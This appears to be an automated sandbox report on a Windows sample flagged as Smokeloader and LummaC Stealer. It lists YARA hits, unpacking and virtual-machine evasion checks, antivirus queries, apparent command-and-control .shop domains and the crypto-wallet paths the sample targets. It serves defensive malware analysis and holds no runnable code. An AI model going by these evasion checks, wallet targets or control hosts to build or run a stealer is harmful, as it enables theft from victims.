Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@1/1

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Code function: 0_2_02AC23F6 CreateToolhelp32Snapshot,Module32First,

0_2_02AC23F6

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Code function: 0_2_0042A44A CoCreateInstance,

0_2_0042A44A

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7344

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\20c3f1be-1496-405a-b095-ab5d7a4c226e

Jump to behavior

Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925125082.0000000004F34000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7344 -s 1640

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe.400000.0.unpack

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00426000 push eax; mov dword ptr [esp], ecx	0_2_00426005
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_004418A8 push edx; ret	0_2_004418AA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028D6267 push eax; mov dword ptr [esp], ecx	0_2_028D626C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028BCE9E push esp; retf	0_2_028BCEA4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_02AC520D push edi; ret	0_2_02AC5211
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_02AC5EB2 push esp; ret	0_2_02AC5EBC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_02AC5F9D push edi; iretd	0_2_02AC5F9E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_02AC2F0E pushad ; ret	0_2_02AC2F0F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_02AC4D49 pushad ; ret	0_2_02AC4D4A

Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Static PE information: section name: .text entropy: 7.858975641411642

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe TID: 7420	Thread sleep time: -210000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe TID: 7420	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925499424.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949210599.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1961272232.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925309705.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949376652.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000002.2156517909.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1924065566.0000000002B18000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1973966010.0000000002B16000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000002.2156517909.0000000002AED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

API call chain: ExitProcess graph end node

graph_0-22533

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Code function: 0_2_00438180 LdrInitializeThunk,

0_2_00438180

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028B092B mov eax, dword ptr fs:[00000030h]	0_2_028B092B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028B0D90 mov eax, dword ptr fs:[00000030h]	0_2_028B0D90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_02AC1CD3 push dword ptr fs:[00000030h]	0_2_02AC1CD3

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	String found in binary or memory: publicitttyps.shop
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	String found in binary or memory: answerrsdo.shop
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	String found in binary or memory: radiationnopp.shop
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	String found in binary or memory: affecthorsedpo.shop
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	String found in binary or memory: bargainnykwo.shop
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	String found in binary or memory: bannngwko.shop
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	String found in binary or memory: bouncedgowp.shop
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	String found in binary or memory: stationacutwo.shop
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	String found in binary or memory: benchillppwo.shop

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000002.2156517909.0000000002B03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rogramFiles%\Windows Defender\MsMpeng.exe
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.2002489447.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1990025636.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000002.2156517909.0000000002B98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925499424.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925499424.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925499424.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925499424.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925499424.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1926109574.0000000002B7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1924065566.0000000002B18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925499424.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
